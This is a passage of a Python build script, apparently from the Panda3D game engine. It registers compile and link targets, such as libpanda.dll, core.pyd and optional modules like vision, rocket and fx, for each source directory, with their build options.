TargetAdd('p3display_graphicsStateGuardian_ext.obj', opts=OPTS, input='graphicsStateGuardian_ext.cxx')
TargetAdd('p3display_graphicsWindow_ext.obj', opts=OPTS, input='graphicsWindow_ext.cxx')
TargetAdd('p3display_pythonGraphicsWindowProc.obj', opts=OPTS, input='pythonGraphicsWindowProc.cxx')
if RTDIST and GetTarget() == 'darwin':
OPTS=['DIR:panda/src/display']
TargetAdd('subprocessWindowBuffer.obj', opts=OPTS, input='subprocessWindowBuffer.cxx')
TargetAdd('libp3subprocbuffer.ilb', input='subprocessWindowBuffer.obj')
#
# DIRECTORY: panda/src/device/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/device', 'BUILDING:PANDA']
TargetAdd('p3device_composite1.obj', opts=OPTS, input='p3device_composite1.cxx')
TargetAdd('p3device_composite2.obj', opts=OPTS, input='p3device_composite2.cxx')
OPTS=['DIR:panda/src/device', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/device', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3device.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3device.in', opts=['IMOD:panda3d.core', 'ILIB:libp3device', 'SRCDIR:panda/src/device'])
TargetAdd('libp3device_igate.obj', input='libp3device.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmtext/
#
if (PkgSkip("FREETYPE")==0 and not RUNTIME):
OPTS=['DIR:panda/src/pnmtext', 'BUILDING:PANDA', 'FREETYPE']
TargetAdd('p3pnmtext_composite1.obj', opts=OPTS, input='p3pnmtext_composite1.cxx')
OPTS=['DIR:panda/src/pnmtext', 'FREETYPE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pnmtext', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pnmtext.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pnmtext.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pnmtext', 'SRCDIR:panda/src/pnmtext'])
TargetAdd('libp3pnmtext_igate.obj', input='libp3pnmtext.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/text/
#
if (not RUNTIME):
if not PkgSkip("HARFBUZZ"):
DefSymbol("HARFBUZZ", "HAVE_HARFBUZZ")
OPTS=['DIR:panda/src/text', 'BUILDING:PANDA', 'ZLIB', 'FREETYPE', 'HARFBUZZ']
TargetAdd('p3text_composite1.obj', opts=OPTS, input='p3text_composite1.cxx')
TargetAdd('p3text_composite2.obj', opts=OPTS, input='p3text_composite2.cxx')
OPTS=['DIR:panda/src/text', 'ZLIB', 'FREETYPE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/text', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3text.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3text.in', opts=['IMOD:panda3d.core', 'ILIB:libp3text', 'SRCDIR:panda/src/text'])
TargetAdd('libp3text_igate.obj', input='libp3text.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/movies/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/movies', 'BUILDING:PANDA', 'VORBIS', 'OPUS']
TargetAdd('p3movies_composite1.obj', opts=OPTS, input='p3movies_composite1.cxx')
OPTS=['DIR:panda/src/movies', 'VORBIS', 'OPUS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/movies', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3movies.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3movies.in', opts=['IMOD:panda3d.core', 'ILIB:libp3movies', 'SRCDIR:panda/src/movies'])
TargetAdd('libp3movies_igate.obj', input='libp3movies.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/grutil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/grutil', 'BUILDING:PANDA']
TargetAdd('p3grutil_multitexReducer.obj', opts=OPTS, input='multitexReducer.cxx')
TargetAdd('p3grutil_composite1.obj', opts=OPTS, input='p3grutil_composite1.cxx')
TargetAdd('p3grutil_composite2.obj', opts=OPTS, input='p3grutil_composite2.cxx')
OPTS=['DIR:panda/src/grutil', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/grutil', ["*.h", "*_composite*.cxx"])
if 'convexHull.h' in IGATEFILES: IGATEFILES.remove('convexHull.h')
TargetAdd('libp3grutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3grutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3grutil', 'SRCDIR:panda/src/grutil'])
TargetAdd('libp3grutil_igate.obj', input='libp3grutil.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/tform/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/tform', 'BUILDING:PANDA']
TargetAdd('p3tform_composite1.obj', opts=OPTS, input='p3tform_composite1.cxx')
TargetAdd('p3tform_composite2.obj', opts=OPTS, input='p3tform_composite2.cxx')
OPTS=['DIR:panda/src/tform', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/tform', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3tform.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3tform.in', opts=['IMOD:panda3d.core', 'ILIB:libp3tform', 'SRCDIR:panda/src/tform'])
TargetAdd('libp3tform_igate.obj', input='libp3tform.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/collide/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/collide', 'BUILDING:PANDA']
TargetAdd('p3collide_composite1.obj', opts=OPTS, input='p3collide_composite1.cxx')
TargetAdd('p3collide_composite2.obj', opts=OPTS, input='p3collide_composite2.cxx')
OPTS=['DIR:panda/src/collide', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/collide', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3collide.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3collide.in', opts=['IMOD:panda3d.core', 'ILIB:libp3collide', 'SRCDIR:panda/src/collide'])
TargetAdd('libp3collide_igate.obj', input='libp3collide.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/parametrics/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/parametrics', 'BUILDING:PANDA']
TargetAdd('p3parametrics_composite1.obj', opts=OPTS, input='p3parametrics_composite1.cxx')
TargetAdd('p3parametrics_composite2.obj', opts=OPTS, input='p3parametrics_composite2.cxx')
OPTS=['DIR:panda/src/parametrics', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/parametrics', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3parametrics.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3parametrics.in', opts=['IMOD:panda3d.core', 'ILIB:libp3parametrics', 'SRCDIR:panda/src/parametrics'])
TargetAdd('libp3parametrics_igate.obj', input='libp3parametrics.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pgui/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgui', 'BUILDING:PANDA']
TargetAdd('p3pgui_composite1.obj', opts=OPTS, input='p3pgui_composite1.cxx')
TargetAdd('p3pgui_composite2.obj', opts=OPTS, input='p3pgui_composite2.cxx')
OPTS=['DIR:panda/src/pgui', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgui', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pgui.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgui.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgui', 'SRCDIR:panda/src/pgui'])
TargetAdd('libp3pgui_igate.obj', input='libp3pgui.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmimagetypes/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pnmimagetypes', 'DIR:panda/src/pnmimage', 'BUILDING:PANDA', 'PNG', 'ZLIB', 'JPEG', 'TIFF', 'OPENEXR', 'EXCEPTIONS']
TargetAdd('p3pnmimagetypes_composite1.obj', opts=OPTS, input='p3pnmimagetypes_composite1.cxx')
TargetAdd('p3pnmimagetypes_composite2.obj', opts=OPTS, input='p3pnmimagetypes_composite2.cxx')
#
# DIRECTORY: panda/src/recorder/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/recorder', 'BUILDING:PANDA']
TargetAdd('p3recorder_composite1.obj', opts=OPTS, input='p3recorder_composite1.cxx')
TargetAdd('p3recorder_composite2.obj', opts=OPTS, input='p3recorder_composite2.cxx')
OPTS=['DIR:panda/src/recorder', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/recorder', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3recorder.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3recorder.in', opts=['IMOD:panda3d.core', 'ILIB:libp3recorder', 'SRCDIR:panda/src/recorder'])
TargetAdd('libp3recorder_igate.obj', input='libp3recorder.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/dxml/
#
DefSymbol("TINYXML", "TIXML_USE_STL", "")
OPTS=['DIR:panda/src/dxml', 'TINYXML']
TargetAdd('tinyxml_composite1.obj', opts=OPTS, input='tinyxml_composite1.cxx')
TargetAdd('libp3tinyxml.ilb', input='tinyxml_composite1.obj')
if (not RUNTIME):
OPTS=['DIR:panda/src/dxml', 'BUILDING:PANDA', 'TINYXML']
TargetAdd('p3dxml_composite1.obj', opts=OPTS, input='p3dxml_composite1.cxx')
OPTS=['DIR:panda/src/dxml', 'TINYXML', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/dxml', ["*.h", "p3dxml_composite1.cxx"])
TargetAdd('libp3dxml.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dxml.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dxml', 'SRCDIR:panda/src/dxml'])
TargetAdd('libp3dxml_igate.obj', input='libp3dxml.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/panda/
#
if (not RUNTIME):
OPTS=['DIR:panda/metalibs/panda', 'BUILDING:PANDA', 'JPEG', 'PNG', 'HARFBUZZ',
'TIFF', 'OPENEXR', 'ZLIB', 'OPENSSL', 'FREETYPE', 'FFTW', 'ADVAPI', 'WINSOCK2',
'SQUISH', 'NVIDIACG', 'VORBIS', 'OPUS', 'WINUSER', 'WINMM', 'WINGDI', 'IPHLPAPI']
TargetAdd('panda_panda.obj', opts=OPTS, input='panda.cxx')
TargetAdd('libpanda.dll', input='panda_panda.obj')
TargetAdd('libpanda.dll', input='p3recorder_composite1.obj')
TargetAdd('libpanda.dll', input='p3recorder_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraphnodes_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgraphnodes_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraph_nodePath.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite3.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite4.obj')
TargetAdd('libpanda.dll', input='p3cull_composite1.obj')
TargetAdd('libpanda.dll', input='p3cull_composite2.obj')
TargetAdd('libpanda.dll', input='p3movies_composite1.obj')
TargetAdd('libpanda.dll', input='p3grutil_multitexReducer.obj')
TargetAdd('libpanda.dll', input='p3grutil_composite1.obj')
TargetAdd('libpanda.dll', input='p3grutil_composite2.obj')
TargetAdd('libpanda.dll', input='p3chan_composite1.obj')
TargetAdd('libpanda.dll', input='p3chan_composite2.obj')
TargetAdd('libpanda.dll', input='p3pstatclient_composite1.obj')
TargetAdd('libpanda.dll', input='p3pstatclient_composite2.obj')
TargetAdd('libpanda.dll', input='p3char_composite1.obj')
TargetAdd('libpanda.dll', input='p3char_composite2.obj')
TargetAdd('libpanda.dll', input='p3collide_composite1.obj')
TargetAdd('libpanda.dll', input='p3collide_composite2.obj')
TargetAdd('libpanda.dll', input='p3device_composite1.obj')
TargetAdd('libpanda.dll', input='p3device_composite2.obj')
TargetAdd('libpanda.dll', input='p3dgraph_composite1.obj')
TargetAdd('libpanda.dll', input='p3dgraph_composite2.obj')
TargetAdd('libpanda.dll', input='p3display_composite1.obj')
TargetAdd('libpanda.dll', input='p3display_composite2.obj')
TargetAdd('libpanda.dll', input='p3pipeline_composite1.obj')
TargetAdd('libpanda.dll', input='p3pipeline_composite2.obj')
TargetAdd('libpanda.dll', input='p3pipeline_contextSwitch.obj')
TargetAdd('libpanda.dll', input='p3event_composite1.obj')
TargetAdd('libpanda.dll', input='p3event_composite2.obj')
TargetAdd('libpanda.dll', input='p3gobj_composite1.obj')
TargetAdd('libpanda.dll', input='p3gobj_composite2.obj')
TargetAdd('libpanda.dll', input='p3gsgbase_composite1.obj')
TargetAdd('libpanda.dll', input='p3linmath_composite1.obj')
TargetAdd('libpanda.dll', input='p3linmath_composite2.obj')
TargetAdd('libpanda.dll', input='p3mathutil_composite1.obj')
TargetAdd('libpanda.dll', input='p3mathutil_composite2.obj')
TargetAdd('libpanda.dll', input='p3parametrics_composite1.obj')
TargetAdd('libpanda.dll', input='p3parametrics_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimagetypes_composite1.obj')
TargetAdd('libpanda.dll', input='p3pnmimagetypes_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_composite1.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_convert_srgb_sse2.obj')
TargetAdd('libpanda.dll', input='p3text_composite1.obj')
TargetAdd('libpanda.dll', input='p3text_composite2.obj')
TargetAdd('libpanda.dll', input='p3tform_composite1.obj')
TargetAdd('libpanda.dll', input='p3tform_composite2.obj')
TargetAdd('libpanda.dll', input='p3putil_composite1.obj')
TargetAdd('libpanda.dll', input='p3putil_composite2.obj')
TargetAdd('libpanda.dll', input='p3audio_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgui_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgui_composite2.obj')
TargetAdd('libpanda.dll', input='p3net_composite1.obj')
TargetAdd('libpanda.dll', input='p3net_composite2.obj')
TargetAdd('libpanda.dll', input='p3nativenet_composite1.obj')
TargetAdd('libpanda.dll', input='p3pandabase_pandabase.obj')
TargetAdd('libpanda.dll', input='libpandaexpress.dll')
TargetAdd('libpanda.dll', input='p3dxml_composite1.obj')
TargetAdd('libpanda.dll', input='libp3dtoolconfig.dll')
TargetAdd('libpanda.dll', input='libp3dtool.dll')
if PkgSkip("FREETYPE")==0:
TargetAdd('libpanda.dll', input="p3pnmtext_composite1.obj")
TargetAdd('libpanda.dll', dep='dtool_have_freetype.dat')
TargetAdd('libpanda.dll', opts=OPTS)
TargetAdd('core_module.obj', input='libp3dtoolbase.in')
TargetAdd('core_module.obj', input='libp3dtoolutil.in')
TargetAdd('core_module.obj', input='libp3prc.in')
TargetAdd('core_module.obj', input='libp3downloader.in')
TargetAdd('core_module.obj', input='libp3express.in')
TargetAdd('core_module.obj', input='libp3recorder.in')
TargetAdd('core_module.obj', input='libp3pgraphnodes.in')
TargetAdd('core_module.obj', input='libp3pgraph.in')
TargetAdd('core_module.obj', input='libp3cull.in')
TargetAdd('core_module.obj', input='libp3grutil.in')
TargetAdd('core_module.obj', input='libp3chan.in')
TargetAdd('core_module.obj', input='libp3pstatclient.in')
TargetAdd('core_module.obj', input='libp3char.in')
TargetAdd('core_module.obj', input='libp3collide.in')
TargetAdd('core_module.obj', input='libp3device.in')
TargetAdd('core_module.obj', input='libp3dgraph.in')
TargetAdd('core_module.obj', input='libp3display.in')
TargetAdd('core_module.obj', input='libp3pipeline.in')
TargetAdd('core_module.obj', input='libp3event.in')
TargetAdd('core_module.obj', input='libp3gobj.in')
TargetAdd('core_module.obj', input='libp3gsgbase.in')
TargetAdd('core_module.obj', input='libp3linmath.in')
TargetAdd('core_module.obj', input='libp3mathutil.in')
TargetAdd('core_module.obj', input='libp3parametrics.in')
TargetAdd('core_module.obj', input='libp3pnmimage.in')
TargetAdd('core_module.obj', input='libp3text.in')
TargetAdd('core_module.obj', input='libp3tform.in')
TargetAdd('core_module.obj', input='libp3putil.in')
TargetAdd('core_module.obj', input='libp3audio.in')
TargetAdd('core_module.obj', input='libp3nativenet.in')
TargetAdd('core_module.obj', input='libp3net.in')
TargetAdd('core_module.obj', input='libp3pgui.in')
TargetAdd('core_module.obj', input='libp3movies.in')
TargetAdd('core_module.obj', input='libp3dxml.in')
if PkgSkip("FREETYPE")==0:
TargetAdd('core_module.obj', input='libp3pnmtext.in')
TargetAdd('core_module.obj', opts=['PYTHON'])
TargetAdd('core_module.obj', opts=['IMOD:panda3d.core', 'ILIB:core'])
TargetAdd('core.pyd', input='libp3dtoolbase_igate.obj')
TargetAdd('core.pyd', input='p3dtoolbase_typeHandle_ext.obj')
TargetAdd('core.pyd', input='libp3dtoolutil_igate.obj')
TargetAdd('core.pyd', input='p3dtoolutil_ext_composite.obj')
TargetAdd('core.pyd', input='libp3prc_igate.obj')
TargetAdd('core.pyd', input='p3prc_ext_composite.obj')
TargetAdd('core.pyd', input='libp3downloader_igate.obj')
TargetAdd('core.pyd', input='p3downloader_stringStream_ext.obj')
TargetAdd('core.pyd', input='p3express_ext_composite.obj')
TargetAdd('core.pyd', input='libp3express_igate.obj')
TargetAdd('core.pyd', input='libp3recorder_igate.obj')
TargetAdd('core.pyd', input='libp3pgraphnodes_igate.obj')
TargetAdd('core.pyd', input='libp3pgraph_igate.obj')
TargetAdd('core.pyd', input='libp3movies_igate.obj')
TargetAdd('core.pyd', input='libp3grutil_igate.obj')
TargetAdd('core.pyd', input='libp3chan_igate.obj')
TargetAdd('core.pyd', input='libp3pstatclient_igate.obj')
TargetAdd('core.pyd', input='libp3char_igate.obj')
TargetAdd('core.pyd', input='libp3collide_igate.obj')
TargetAdd('core.pyd', input='libp3device_igate.obj')
TargetAdd('core.pyd', input='libp3dgraph_igate.obj')
TargetAdd('core.pyd', input='libp3display_igate.obj')
TargetAdd('core.pyd', input='libp3pipeline_igate.obj')
TargetAdd('core.pyd', input='libp3event_igate.obj')
TargetAdd('core.pyd', input='libp3gobj_igate.obj')
TargetAdd('core.pyd', input='libp3gsgbase_igate.obj')
TargetAdd('core.pyd', input='libp3linmath_igate.obj')
TargetAdd('core.pyd', input='libp3mathutil_igate.obj')
TargetAdd('core.pyd', input='libp3parametrics_igate.obj')
TargetAdd('core.pyd', input='libp3pnmimage_igate.obj')
TargetAdd('core.pyd', input='libp3text_igate.obj')
TargetAdd('core.pyd', input='libp3tform_igate.obj')
TargetAdd('core.pyd', input='libp3putil_igate.obj')
TargetAdd('core.pyd', input='libp3audio_igate.obj')
TargetAdd('core.pyd', input='libp3pgui_igate.obj')
TargetAdd('core.pyd', input='libp3net_igate.obj')
TargetAdd('core.pyd', input='libp3nativenet_igate.obj')
TargetAdd('core.pyd', input='libp3dxml_igate.obj')
if PkgSkip("FREETYPE")==0:
TargetAdd('core.pyd', input="libp3pnmtext_igate.obj")
TargetAdd('core.pyd', input='p3pipeline_pythonThread.obj')
TargetAdd('core.pyd', input='p3putil_ext_composite.obj')
TargetAdd('core.pyd', input='p3pnmimage_pfmFile_ext.obj')
TargetAdd('core.pyd', input='p3event_asyncFuture_ext.obj')
TargetAdd('core.pyd', input='p3event_pythonTask.obj')
TargetAdd('core.pyd', input='p3gobj_ext_composite.obj')
TargetAdd('core.pyd', input='p3pgraph_ext_composite.obj')
TargetAdd('core.pyd', input='p3display_graphicsStateGuardian_ext.obj')
TargetAdd('core.pyd', input='p3display_graphicsWindow_ext.obj')
TargetAdd('core.pyd', input='p3display_pythonGraphicsWindowProc.obj')
TargetAdd('core.pyd', input='core_module.obj')
if not GetLinkAllStatic() and GetTarget() != 'emscripten':
TargetAdd('core.pyd', input='libp3tinyxml.ilb')
TargetAdd('core.pyd', input='libp3interrogatedb.dll')
TargetAdd('core.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('core.pyd', opts=['PYTHON', 'WINSOCK2'])
#
# DIRECTORY: panda/src/vision/
#
if (PkgSkip("VISION") == 0) and (not RUNTIME):
# We want to know whether we have ffmpeg so that we can override the .avi association.
if not PkgSkip("FFMPEG"):
DefSymbol("OPENCV", "HAVE_FFMPEG")
if not PkgSkip("OPENCV"):
DefSymbol("OPENCV", "HAVE_OPENCV")
if OPENCV_VER_23:
DefSymbol("OPENCV", "OPENCV_VER_23")
OPTS=['DIR:panda/src/vision', 'BUILDING:VISION', 'ARTOOLKIT', 'OPENCV', 'DX9', 'DIRECTCAM', 'JPEG', 'EXCEPTIONS']
TargetAdd('p3vision_composite1.obj', opts=OPTS, input='p3vision_composite1.cxx', dep=[
'dtool_have_ffmpeg.dat',
'dtool_have_opencv.dat',
'dtool_have_directcam.dat',
])
TargetAdd('libp3vision.dll', input='p3vision_composite1.obj')
TargetAdd('libp3vision.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3vision.dll', opts=OPTS)
OPTS=['DIR:panda/src/vision', 'ARTOOLKIT', 'OPENCV', 'DX9', 'DIRECTCAM', 'JPEG', 'EXCEPTIONS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/vision', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3vision.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3vision.in', opts=['IMOD:panda3d.vision', 'ILIB:libp3vision', 'SRCDIR:panda/src/vision'])
TargetAdd('libp3vision_igate.obj', input='libp3vision.in', opts=["DEPENDENCYONLY"])
TargetAdd('vision_module.obj', input='libp3vision.in')
TargetAdd('vision_module.obj', opts=OPTS)
TargetAdd('vision_module.obj', opts=['IMOD:panda3d.vision', 'ILIB:vision', 'IMPORT:panda3d.core'])
TargetAdd('vision.pyd', input='vision_module.obj')
TargetAdd('vision.pyd', input='libp3vision_igate.obj')
TargetAdd('vision.pyd', input='libp3vision.dll')
TargetAdd('vision.pyd', input='libp3interrogatedb.dll')
TargetAdd('vision.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('vision.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/rocket/
#
if (PkgSkip("ROCKET") == 0) and (not RUNTIME):
OPTS=['DIR:panda/src/rocket', 'BUILDING:ROCKET', 'ROCKET', 'PYTHON']
TargetAdd('p3rocket_composite1.obj', opts=OPTS, input='p3rocket_composite1.cxx')
TargetAdd('libp3rocket.dll', input='p3rocket_composite1.obj')
TargetAdd('libp3rocket.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3rocket.dll', opts=OPTS)
OPTS=['DIR:panda/src/rocket', 'ROCKET', 'RTTI', 'EXCEPTIONS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/rocket', ["rocketInputHandler.h",
"rocketInputHandler.cxx", "rocketRegion.h", "rocketRegion.cxx", "rocketRegion_ext.h"])
TargetAdd('libp3rocket.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3rocket.in', opts=['IMOD:panda3d.rocket', 'ILIB:libp3rocket', 'SRCDIR:panda/src/rocket'])
TargetAdd('libp3rocket_igate.obj', input='libp3rocket.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3rocket_rocketRegion_ext.obj', opts=OPTS, input='rocketRegion_ext.cxx')
TargetAdd('rocket_module.obj', input='libp3rocket.in')
TargetAdd('rocket_module.obj', opts=OPTS)
TargetAdd('rocket_module.obj', opts=['IMOD:panda3d.rocket', 'ILIB:rocket', 'IMPORT:panda3d.core'])
TargetAdd('rocket.pyd', input='rocket_module.obj')
TargetAdd('rocket.pyd', input='libp3rocket_igate.obj')
TargetAdd('rocket.pyd', input='p3rocket_rocketRegion_ext.obj')
TargetAdd('rocket.pyd', input='libp3rocket.dll')
TargetAdd('rocket.pyd', input='libp3interrogatedb.dll')
TargetAdd('rocket.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('rocket.pyd', opts=['PYTHON', 'ROCKET'])
#
# DIRECTORY: panda/src/p3awesomium
#
if PkgSkip("AWESOMIUM") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/awesomium', 'BUILDING:PANDAAWESOMIUM', 'AWESOMIUM']
TargetAdd('pandaawesomium_composite1.obj', opts=OPTS, input='pandaawesomium_composite1.cxx')
TargetAdd('libp3awesomium.dll', input='pandaawesomium_composite1.obj')
TargetAdd('libp3awesomium.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3awesomium.dll', opts=OPTS)
OPTS=['DIR:panda/src/awesomium', 'AWESOMIUM', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/awesomium', ["*.h", "*_composite1.cxx"])
TargetAdd('libp3awesomium.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3awesomium.in', opts=['IMOD:panda3d.awesomium', 'ILIB:libp3awesomium', 'SRCDIR:panda/src/awesomium'])
TargetAdd('libp3awesomium_igate.obj', input='libp3awesomium.in', opts=["DEPENDENCYONLY"])
TargetAdd('awesomium_module.obj', input='libp3awesomium.in')
TargetAdd('awesomium_module.obj', opts=OPTS)
TargetAdd('awesomium_module.obj', opts=['IMOD:panda3d.awesomium', 'ILIB:awesomium', 'IMPORT:panda3d.core'])
TargetAdd('awesomium.pyd', input='awesomium_module.obj')
TargetAdd('awesomium.pyd', input='libp3awesomium_igate.obj')
TargetAdd('awesomium.pyd', input='libp3awesomium.dll')
TargetAdd('awesomium.pyd', input='libp3interrogatedb.dll')
TargetAdd('awesomium.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('awesomium.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/p3skel
#
if (PkgSkip('SKEL')==0) and (not RUNTIME):
OPTS=['DIR:panda/src/skel', 'BUILDING:PANDASKEL', 'ADVAPI']
TargetAdd('p3skel_composite1.obj', opts=OPTS, input='p3skel_composite1.cxx')
OPTS=['DIR:panda/src/skel', 'ADVAPI', 'PYTHON']
IGATEFILES=GetDirectoryContents("panda/src/skel", ["*.h", "*_composite*.cxx"])
TargetAdd('libp3skel.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3skel.in', opts=['IMOD:panda3d.skel', 'ILIB:libp3skel', 'SRCDIR:panda/src/skel'])
TargetAdd('libp3skel_igate.obj', input='libp3skel.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/p3skel
#
if (PkgSkip('SKEL')==0) and (not RUNTIME):
OPTS=['BUILDING:PANDASKEL', 'ADVAPI']
TargetAdd('libpandaskel.dll', input='p3skel_composite1.obj')
TargetAdd('libpandaskel.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaskel.dll', opts=OPTS)
OPTS=['PYTHON']
TargetAdd('skel_module.obj', input='libp3skel.in')
TargetAdd('skel_module.obj', opts=OPTS)
TargetAdd('skel_module.obj', opts=['IMOD:panda3d.skel', 'ILIB:skel', 'IMPORT:panda3d.core'])
TargetAdd('skel.pyd', input='skel_module.obj')
TargetAdd('skel.pyd', input='libp3skel_igate.obj')
TargetAdd('skel.pyd', input='libpandaskel.dll')
TargetAdd('skel.pyd', input='libp3interrogatedb.dll')
TargetAdd('skel.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('skel.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/distort/
#
if (PkgSkip('PANDAFX')==0) and (not RUNTIME):
OPTS=['DIR:panda/src/distort', 'BUILDING:PANDAFX']
TargetAdd('p3distort_composite1.obj', opts=OPTS, input='p3distort_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'NVIDIACG', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/distort', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3distort.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3distort.in', opts=['IMOD:panda3d.fx', 'ILIB:libp3distort', 'SRCDIR:panda/src/distort'])
TargetAdd('libp3distort_igate.obj', input='libp3distort.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandafx/
#
if (PkgSkip('PANDAFX')==0) and (not RUNTIME):
OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'BUILDING:PANDAFX', 'NVIDIACG']
TargetAdd('pandafx_pandafx.obj', opts=OPTS, input='pandafx.cxx')
TargetAdd('libpandafx.dll', input='pandafx_pandafx.obj')
TargetAdd('libpandafx.dll', input='p3distort_composite1.obj')
TargetAdd('libpandafx.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandafx.dll', opts=['ADVAPI', 'NVIDIACG'])
OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'NVIDIACG', 'PYTHON']
TargetAdd('fx_module.obj', input='libp3distort.in')
TargetAdd('fx_module.obj', opts=OPTS)
TargetAdd('fx_module.obj', opts=['IMOD:panda3d.fx', 'ILIB:fx', 'IMPORT:panda3d.core'])
TargetAdd('fx.pyd', input='fx_module.obj')
TargetAdd('fx.pyd', input='libp3distort_igate.obj')
TargetAdd('fx.pyd', input='libpandafx.dll')
TargetAdd('fx.pyd', input='libp3interrogatedb.dll')
TargetAdd('fx.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('fx.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/vrpn/
#
if (PkgSkip("VRPN")==0 and not RUNTIME):
OPTS=['DIR:panda/src/vrpn', 'BUILDING:VRPN', 'VRPN']
TargetAdd('p3vrpn_composite1.obj', opts=OPTS, input='p3vrpn_composite1.cxx')
TargetAdd('libp3vrpn.dll', input='p3vrpn_composite1.obj')
TargetAdd('libp3vrpn.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3vrpn.dll', opts=['VRPN'])
OPTS=['DIR:panda/src/vrpn', 'VRPN', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/vrpn', ["*.h", "*_composite*.cxx"])
